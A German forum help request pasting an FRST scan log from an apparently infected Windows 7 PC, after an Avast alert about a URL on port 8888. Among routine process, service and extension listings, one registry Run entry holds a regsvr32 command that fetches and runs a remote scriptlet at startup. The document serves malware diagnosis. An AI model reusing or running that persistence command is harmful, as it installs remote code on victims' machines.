Avast Bedrohungsmeldung - Objekt: http://047.088.216.068:8888/test.dat Ganz frisch:
Code:
Alles auswählen Aufklappen ATTFilter
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 06-05-2017
durchgeführt von Hamlet (Administrator) auf WIN7PC (06-05-2017 22:32:04)
Gestartet von C:\Users\Hamlet\Desktop
Geladene Profile: Hamlet (Verfügbare Profile: Hamlet & UpdatusUser & Entwickler & Administrator & SQL Server Distributed Replay Controller & MsDtsServer110 & MSSQLServerOLAPService & ReportServer & SQL Server Distributed Replay Client & MSSQLFDLauncher & SQLSERVERAGENT & MSSQLSERVER)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: "C:\Program Files (x86)\Internet\SeaMonkey\seamonkey.exe" -requestPending -osint -url "%1")
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Prozesse (Nicht auf der Ausnahmeliste) =================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
() C:\Program Files (x86)\GNU\GnuPG\dirmngr.exe
(Firebird Project) C:\Program Files\DataBases\Firebird_2_5\bin\fbguard.exe
(Firebird Project) C:\Program Files\DataBases\Firebird_2_5\bin\fbserver.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\VS7DEBUG\MDM.EXE
(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
(VIA) C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDeck.exe
(hxxp://tortoisesvn.net) C:\Program Files\Internet\TortoiseSVN\bin\TSVNCache.exe
(Golden Frog, GmbH.) C:\Program Files (x86)\VyprVPN\VyprVPNService.exe
(Golden Frog, GmbH.) C:\Program Files (x86)\VyprVPN\VyprVPN.exe
(The OpenVPN Project) C:\Program Files (x86)\VyprVPN\OpenVPN\bin\openvpn.exe
(T-Systems Enterprise Services GmbH) C:\Program Files (x86)\T-Online\DSL-Manager\DslMgr.exe
(T-Systems Enterprise Services GmbH) C:\Program Files (x86)\T-Online\DSL-Manager\DslMgrSvc.exe
(mozilla.org) C:\Program Files (x86)\Internet\SeaMonkey\seamonkey.exe
==================== Registry (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)
HKLM\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.mykings.top:280/v.sct scrobj.dll
HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [2780112 2017-01-20] (Malwarebytes)
HKLM-x32\...\Run: [HDAudDeck] => C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDeck.exe [2171904 2009-06-05] (VIA)
HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\MountPoints2: {531f30f5-1efd-11e5-97cc-002354355c9e} - F:\Startme.exe
ShellIconOverlayIdentifiers: [ 0Cloudfogger] -> {15EDBCBF-7231-4290-946E-5BB12C6AF342} => C:\Program Files\Utils\Cloudfogger\CfShellEx64_1.4.2143.dll -> Keine Datei
ShellIconOverlayIdentifiers: [ 1Cloudfogger] -> {14A3EC74-D852-416A-9691-AC3096EE1953} => C:\Program Files\Utils\Cloudfogger\CfShellEx64_1.4.2143.dll -> Keine Datei
ShellIconOverlayIdentifiers: [ 2Cloudfogger] -> {E9C2814C-12B8-4D74-9551-16DDEBFC8AE4} => C:\Program Files\Utils\Cloudfogger\CfShellEx64_1.4.2143.dll -> Keine Datei
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Keine Datei
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Keine Datei
ShellIconOverlayIdentifiers: [1TortoiseNormal] -> {C5994560-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2011-06-13] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers: [2TortoiseModified] -> {C5994561-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2011-06-13] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers: [3TortoiseConflict] -> {C5994562-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2011-06-13] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers: [4TortoiseLocked] -> {C5994563-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2011-06-13] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers: [5TortoiseReadOnly] -> {C5994564-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2011-06-13] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers: [6TortoiseDeleted] -> {C5994565-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2011-06-13] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers: [7TortoiseAdded] -> {C5994566-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2011-06-13] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers: [8TortoiseIgnored] -> {C5994567-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2011-06-13] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers: [9TortoiseUnversioned] -> {C5994568-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2011-06-13] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers-x32: [ 0Cloudfogger] -> {15EDBCBF-7231-4290-946E-5BB12C6AF342} => C:\Program Files\Utils\Cloudfogger\CfShellEx_1.4.2143.dll -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ 1Cloudfogger] -> {14A3EC74-D852-416A-9691-AC3096EE1953} => C:\Program Files\Utils\Cloudfogger\CfShellEx_1.4.2143.dll -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ 2Cloudfogger] -> {E9C2814C-12B8-4D74-9551-16DDEBFC8AE4} => C:\Program Files\Utils\Cloudfogger\CfShellEx_1.4.2143.dll -> Keine Datei
ShellIconOverlayIdentifiers-x32: [1TortoiseNormal] -> {C5994560-53D9-4125-87C9-F193FC689CB2} => C:\Program Files (x86)\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2011-06-13] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers-x32: [2TortoiseModified] -> {C5994561-53D9-4125-87C9-F193FC689CB2} => C:\Program Files (x86)\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2011-06-13] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers-x32: [3TortoiseConflict] -> {C5994562-53D9-4125-87C9-F193FC689CB2} => C:\Program Files (x86)\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2011-06-13] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers-x32: [4TortoiseLocked] -> {C5994563-53D9-4125-87C9-F193FC689CB2} => C:\Program Files (x86)\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2011-06-13] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers-x32: [5TortoiseReadOnly] -> {C5994564-53D9-4125-87C9-F193FC689CB2} => C:\Program Files (x86)\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2011-06-13] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers-x32: [6TortoiseDeleted] -> {C5994565-53D9-4125-87C9-F193FC689CB2} => C:\Program Files (x86)\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2011-06-13] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers-x32: [7TortoiseAdded] -> {C5994566-53D9-4125-87C9-F193FC689CB2} => C:\Program Files (x86)\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2011-06-13] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers-x32: [8TortoiseIgnored] -> {C5994567-53D9-4125-87C9-F193FC689CB2} => C:\Program Files (x86)\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2011-06-13] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers-x32: [9TortoiseUnversioned] -> {C5994568-53D9-4125-87C9-F193FC689CB2} => C:\Program Files (x86)\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2011-06-13] (hxxp://tortoisesvn.net)
Startup: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DSL-Manager.lnk [2016-02-28]
ShortcutTarget: DSL-Manager.lnk -> C:\Program Files (x86)\T-Online\DSL-Manager\DslMgr.exe (T-Systems Enterprise Services GmbH)
Startup: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DSL-Manager.lnk [2013-07-20]
ShortcutTarget: DSL-Manager.lnk -> C:\Program Files (x86)\T-Online\DSL-Manager\DslMgr.exe (T-Systems Enterprise Services GmbH)
Startup: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DSL-Manager.lnk [2013-07-20]
ShortcutTarget: DSL-Manager.lnk -> C:\Program Files (x86)\T-Online\DSL-Manager\DslMgr.exe (T-Systems Enterprise Services GmbH)
Startup: C:\Users\Entwickler\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DSL-Manager.lnk [2015-05-23]
ShortcutTarget: DSL-Manager.lnk -> (Keine Datei)
Startup: C:\Users\MsDtsServer110\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DSL-Manager.lnk [2013-07-20]
ShortcutTarget: DSL-Manager.lnk -> C:\Program Files (x86)\T-Online\DSL-Manager\DslMgr.exe (T-Systems Enterprise Services GmbH)
Startup: C:\Users\MSSQLFDLauncher\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DSL-Manager.lnk [2013-07-20]
ShortcutTarget: DSL-Manager.lnk -> C:\Program Files (x86)\T-Online\DSL-Manager\DslMgr.exe (T-Systems Enterprise Services GmbH)
Startup: C:\Users\MSSQLSERVER\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DSL-Manager.lnk [2013-07-20]
ShortcutTarget: DSL-Manager.lnk -> C:\Program Files (x86)\T-Online\DSL-Manager\DslMgr.exe (T-Systems Enterprise Services GmbH)
Startup: C:\Users\MSSQLServerOLAPService\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DSL-Manager.lnk [2013-07-20]
ShortcutTarget: DSL-Manager.lnk -> C:\Program Files (x86)\T-Online\DSL-Manager\DslMgr.exe (T-Systems Enterprise Services GmbH)
Startup: C:\Users\ReportServer\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DSL-Manager.lnk [2013-07-20]
ShortcutTarget: DSL-Manager.lnk -> C:\Program Files (x86)\T-Online\DSL-Manager\DslMgr.exe (T-Systems Enterprise Services GmbH)
Startup: C:\Users\SQL Server Distributed Replay Client\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DSL-Manager.lnk [2013-07-20]
ShortcutTarget: DSL-Manager.lnk -> C:\Program Files (x86)\T-Online\DSL-Manager\DslMgr.exe (T-Systems Enterprise Services GmbH)
Startup: C:\Users\SQL Server Distributed Replay Controller\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DSL-Manager.lnk [2013-07-20]
ShortcutTarget: DSL-Manager.lnk -> C:\Program Files (x86)\T-Online\DSL-Manager\DslMgr.exe (T-Systems Enterprise Services GmbH)
Startup: C:\Users\SQLSERVERAGENT\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DSL-Manager.lnk [2013-07-20]
ShortcutTarget: DSL-Manager.lnk -> C:\Program Files (x86)\T-Online\DSL-Manager\DslMgr.exe (T-Systems Enterprise Services GmbH)
==================== Internet (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)
Hosts: Es ist mehr als ein Eintrag in der Hosts Datei zu finden. Siehe Hosts-Bereich in Addition.txt
Tcpip\Parameters: [DhcpNameServer] 10.3.29.1
Tcpip\..\Interfaces\{768BF69E-701E-424A-BB47-DBCF62B52D28}: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{9AEFD35E-E3C1-41F1-AD9C-43D502202E74}: [NameServer] 8.8.8.8,8.8.4.4,4.2.2.1,4.2.2.2,208.67.222.222,208.67.220.220,8.26.56.26,8.20.247.20,156.154.70.1,156.154.71.1
Tcpip\..\Interfaces\{D05D6B22-7C5B-402A-962B-AE33EB3E9B2E}: [DhcpNameServer] 10.3.29.1
Internet Explorer:
==================
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.symantec.com/redirects/security_response/fix_homepage/index.jsp?lg=de&pid=NIS&pvid=20.4.0.40
HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.symantec.com/redirects/security_response/fix_homepage/index.jsp?lg=de&pid=NIS&pvid=20.4.0.40
HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.symantec.com/redirects/security_response/fix_homepage/index.jsp?lg=de&pid=NIS&pvid=20.4.0.40
HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\Software\Microsoft\Internet Explorer\Main,Start Page = file:///d:/html/_start/startseite.html
HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE10SR
SearchScopes: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001 -> DefaultScope {AC406983-E03C-4ED6-BAA6-566F319910E8} URL =
BHO-x32: HP Print Enhancer -> {0347C33E-8762-4905-BF09-768834316C61} -> C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_printenhancer.dll => Keine Datei
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_131\bin\ssv.dll [2017-04-30] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_131\bin\jp2ssv.dll [2017-04-30] (Oracle Corporation)
BHO-x32: HP Smart BHO Class -> {FFFFFFFF-CF4E-4F2B-BDC2-0E72E116A856} -> C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll => Keine Datei
Toolbar: HKLM-x32 - True Key - {4BAAC1B8-0800-42C9-8FA6-08B211F356B8} - C:\Program Files\Intel Security\True Key\MSIE\truekey_ie.dll Keine Datei
Toolbar: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001 -> Kein Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - Keine Datei
DPF: HKLM {D27CDB6E-AE6D-11CF-96B8-444553540000} hxxp://active.macromedia.com/flash2/cabs/swflash.cab
FireFox:
========
FF ProfilePath: C:\Users\Hamlet\AppData\Roaming\Mozilla\SeaMonkey\Profiles\ya7xd9pj.default [2017-05-06]
FF Homepage: Mozilla\SeaMonkey\Profiles\ya7xd9pj.default -> file:///D:/HTML/_Start/Startseite.html
FF Session Restore: Mozilla\SeaMonkey\Profiles\ya7xd9pj.default -> ist aktiviert.
FF NetworkProxy: Mozilla\SeaMonkey\Profiles\ya7xd9pj.default -> share_proxy_settings", true
FF Extension: (Deutsch (DE) Language Pack) - C:\Users\Hamlet\AppData\Roaming\Mozilla\SeaMonkey\Profiles\ya7xd9pj.default\Extensions\langpack-de@seamonkey.mozilla.org.xpi [2017-03-22] [ist nicht signiert]
FF Extension: (NoScript) - C:\Users\Hamlet\AppData\Roaming\Mozilla\SeaMonkey\Profiles\ya7xd9pj.default\Extensions\{73a6fe31-595d-460b-a920-fcc0f8843232}.xpi [2017-04-23]
FF HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 => nicht gefunden
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_25_0_0_148.dll [2017-04-18] ()
FF Plugin: @videolan.org/vlc,version=2.0.7 -> C:\Program Files\\Media\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.0.8 -> C:\Program Files\\Media\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.1.1 -> C:\Program Files\\Media\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.1.2 -> C:\Program Files\\Media\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.1.3 -> C:\Program Files\\Media\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.1.4 -> C:\Program Files\\Media\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.1.5 -> C:\Program Files\\Media\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.2.4 -> C:\Program Files\\Media\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_148.dll [2017-04-18] ()
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll [2013-10-07] (Google)
FF Plugin-x32: @java.com/DTPlugin,version=11.131.2 -> C:\Program Files (x86)\Java\jre1.8.0_131\bin\dtplugin\npDeployJava1.dll [2017-04-30] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.131.2 -> C:\Program Files (x86)\Java\jre1.8.0_131\bin\plugin2\npjp2.dll [2017-04-30] (Oracle Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2013-06-21] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2013-06-21] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.26.9\npGoogleUpdate3.dll [Keine Datei]
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.26.9\npGoogleUpdate3.dll [Keine Datei]
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-04-05] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-2254724001-3966478908-1047364323-1001: @tools.google.com/Google Update;version=3 -> C:\Users\Hamlet\AppData\Local\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-27] (Google Inc.)
FF Plugin HKU\S-1-5-21-2254724001-3966478908-1047364323-1001: @tools.google.com/Google Update;version=9 -> C:\Users\Hamlet\AppData\Local\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-27] (Google Inc.)
Chrome:
=======
CHR HKLM\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
Opera:
=======
OPR StartupUrls: "file:///D:/HTML/_Start/Startseite.html"
OPR Extension: (Ghostery) - C:\Users\Hamlet\AppData\Roaming\Opera Software\Opera Stable\Extensions\bbkekonodcdmedgffkkbgmnnekbainbg [2017-04-29]
OPR Extension: (Ghostery) - C:\Users\Hamlet\AppData\Roaming\Opera Software\Opera Stable\Extensions\cfbekbndggmbdkfhjandenfihkdkndil [2017-04-14]
OPR Extension: (The Printliminator) - C:\Users\Hamlet\AppData\Roaming\Opera Software\Opera Stable\Extensions\ddlmnofhlaecjnfohaphgklgbiofiigl [2017-04-14]
OPR Extension: (Documents) - C:\Users\Hamlet\AppData\Roaming\Opera Software\Opera Stable\Extensions\dppmcfgmeabflhohikbaegalkbjnbomd [2017-04-14]
OPR Extension: (Suche Bild mit Google) - C:\Users\Hamlet\AppData\Roaming\Opera Software\Opera Stable\Extensions\fomhjmhgjenfigcbolpklkadhliiodpk [2017-04-14]
OPR Extension: (Übersetzen) - C:\Users\Hamlet\AppData\Roaming\Opera Software\Opera Stable\Extensions\ibnombjmjocaccigcefonnipcnlaeaed [2017-04-14]
OPR Extension: (Forget that page) - C:\Users\Hamlet\AppData\Roaming\Opera Software\Opera Stable\Extensions\ieomhnichbamgimkoacbpinnnlnpllej [2017-04-14]
OPR Extension: (Ghostery) - C:\Users\Hamlet\AppData\Roaming\Opera Software\Opera Stable\Extensions\khmbgihnlknbjgjhmekjeoidpfimabpp [2017-04-14]
OPR Extension: (Sidebar for YouTube™) - C:\Users\Hamlet\AppData\Roaming\Opera Software\Opera Stable\Extensions\ljkgfkfopogmclcinephnaeekjiikibd [2017-04-14]
OPR Extension: (SaveFrom.net Helfer) - C:\Users\Hamlet\AppData\Roaming\Opera Software\Opera Stable\Extensions\npdpplbicnmpoigidfdjadamgfkilaak [2017-04-14]
OPR Extension: (Ghostery) - C:\Users\Hamlet\AppData\Roaming\Opera Software\Opera Stable\Extensions\oneajlghdhobcelcgbgkjaipjoopcggg [2017-04-14]
==================== Dienste (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
S3 BlackfishSQL; C:\Program Files (x86)\CodeGear\RAD Studio\6.0\bin\BSQLServer.exe [65536 2009-01-14] (CodeGear) [Datei ist nicht signiert]
R2 DirMngr; C:\Program Files (x86)\GNU\GnuPG\dirmngr.exe [216576 2016-04-05] () [Datei ist nicht signiert]
R2 FirebirdGuardianDefaultInstance; C:\Program Files\DataBases\Firebird_2_5\bin\fbguard.exe [154112 2013-03-19] (Firebird Project) [Datei ist nicht signiert]
R2 FirebirdServerDefaultInstance; C:\Program Files\DataBases\Firebird_2_5\bin\fbserver.exe [5708800 2013-03-19] (Firebird Project) [Datei ist nicht signiert]
S4 hpqcxs08; C:\Program Files (x86)\HP\Digital Imaging\bin\hpqcxs08.dll [248832 2009-05-21] (Hewlett-Packard Co.) [Datei ist nicht signiert]
R2 hpqddsvc; C:\Program Files (x86)\HP\Digital Imaging\bin\hpqddsvc.dll [133120 2009-05-21] (Hewlett-Packard Co.) [Datei ist nicht signiert]
R2 HPSLPSVC; C:\Program Files (x86)\HP\Digital Imaging\bin\HPSLPSVC64.DLL [1037824 2009-09-08] (Hewlett-Packard Co.) [Datei ist nicht signiert]
S2 IBG_developer_ibxe3; C:\Program Files (x86)\Embarcadero\Studio\15.0\InterBaseXE3\bin\ibguard.exe [636744 2014-05-14] (Embarcadero Technologies, Inc.)
S3 IBS_developer_ibxe3; C:\Program Files (x86)\Embarcadero\Studio\15.0\InterBaseXE3\bin\ibserver.exe [5489992 2014-05-14] (Embarcadero Technologies, Inc.)
S3 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4355024 2017-01-20] (Malwarebytes)
S3 MsDtsServer110; C:\Program Files\Microsoft SQL Server\110\DTS\Binn\MsDtsSrvr.exe [218200 2012-02-11] (Microsoft Corporation)
S3 MSSQLFDLauncher; C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\fdlauncher.exe [49752 2012-02-11] (Microsoft Corporation)
S3 MSSQLSERVER; C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe [191064 2012-02-11] (Microsoft Corporation)
S3 MSSQLServerOLAPService; C:\Program Files\Microsoft SQL Server\MSAS11.MSSQLSERVER\OLAP\bin\msmdsrv.exe [61538904 2012-02-11] (Microsoft Corporation)
S3 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2008-12-03] (Hewlett-Packard) [Datei ist nicht signiert]
S3 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2008-12-03] (Hewlett-Packard) [Datei ist nicht signiert]
S3 ReportServer; C:\Program Files\Microsoft SQL Server\MSRS11.MSSQLSERVER\Reporting Services\ReportServer\bin\ReportingServicesService.exe [2348632 2012-02-11] (Microsoft Corporation)
S3 SQL Server Distributed Replay Client; C:\Program Files (x86)\Microsoft SQL Server\110\Tools\DReplayClient\DReplayClient.exe [137304 2012-02-11] (Microsoft Corporation)
S3 SQL Server Distributed Replay Controller; C:\Program Files (x86)\Microsoft SQL Server\110\Tools\DReplayController\DReplayController.exe [342104 2012-02-11] (Microsoft Corporation)
S3 SQLSERVERAGENT; C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\SQLAGENT.EXE [597080 2012-02-11] (Microsoft Corporation)
R3 TDslMgrService; C:\Program Files (x86)\T-Online\DSL-Manager\DslMgrSvc.exe [290816 2007-08-01] (T-Systems Enterprise Services GmbH) [Datei ist nicht signiert]
R3 VyprVPN; C:\Program Files (x86)\VyprVPN\VyprVPNService.exe [270336 2016-10-07] (Golden Frog, GmbH.) [Datei ist nicht signiert]
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
S4 gupdate; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc [X]
S4 gupdatem; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc [X]
S3 PDF Architect 5 Manager; "C:\ProgramData\pdfforge\PDF Architect 5 Manager\PDF Architect 5\Architect Manager.exe" [X]
S3 PDF Architect Helper Service; "C:\Program Files (x86)\PDF Architect\HelperService.exe" [X]
S3 PDF Architect Service; "C:\Program Files (x86)\PDF Architect\ConversionService.exe" [X]
S4 Sony PC Companion; "C:\Program Files (x86)\Sony\Sony PC Companion\PCCService.exe" [X]
===================== Treiber (Nicht auf der Ausnahmeliste) ======================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
S3 Bulk1528; C:\Windows\System32\Drivers\Bulk1528.sys [14848 2008-06-28] (SunPlus)
S2 Ca1528av; C:\Windows\System32\Drivers\Ca1528av.sys [533760 2008-12-17] (Digital Camera)
S2 DgiVecp; C:\Windows\SysWOW64\Drivers\DgiVecp.sys [41984 2007-08-13] (Samsung Electronics Co., Ltd.) [Datei ist nicht signiert]
R1 DslMNLwf; C:\Windows\System32\DRIVERS\dslmnlwf.sys [19008 2007-08-01] (T-Systems Enterprise Services GmbH)
S3 esihdrv; C:\Users\Hamlet\AppData\Local\Temp\esihdrv.sys [134024 2017-04-08] (ESET) <==== ACHTUNG
R3 MTsensor; C:\Windows\System32\DRIVERS\ASACPI.sys [15416 2009-05-14] ()
R1 RsFx0200; C:\Windows\System32\DRIVERS\RsFx0200.sys [334936 2012-02-11] (Microsoft Corporation)
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [834544 2014-07-16] () [Datei ist nicht signiert]
S3 tapvyprvpn; C:\Windows\System32\DRIVERS\tapvyprvpn.sys [44896 2014-08-28] (The OpenVPN Project)
R0 tclondrv; C:\Windows\System32\DRIVERS\tclondrv.sys [26856 2012-02-24] (TuneClone Software)
U5 UnlockerDriver5; C:\Program Files\Utils\Unlocker\UnlockerDriver5.sys [12352 2010-07-01] ()
R1 VBoxNetAdp; C:\Windows\System32\DRIVERS\VBoxNetAdp6.sys [131144 2017-03-15] (Oracle Corporation)
R1 VBoxNetLwf; C:\Windows\System32\DRIVERS\VBoxNetLwf.sys [205440 2017-03-15] (Oracle Corporation)
S3 VBoxUSB; C:\Windows\System32\Drivers\VBoxUSB.sys [135824 2016-07-12] (Oracle Corporation)
S3 NAVENG; \??\C:\Program Files (x86)\Norton Security\NortonData\22.5.0.124\Definitions\SDSDefs\20160614.008\ENG64.SYS [X]
S3 NAVEX15; \??\C:\Program Files (x86)\Norton Security\NortonData\22.5.0.124\Definitions\SDSDefs\20160614.008\EX64.SYS [X]
S3 VBoxNetFlt; system32\DRIVERS\VBoxNetFlt.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
S3 VMnetAdapter; system32\DRIVERS\vmnetadapter.sys [X]
==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
==================== Ein Monat: Erstellte Dateien und Ordner ========
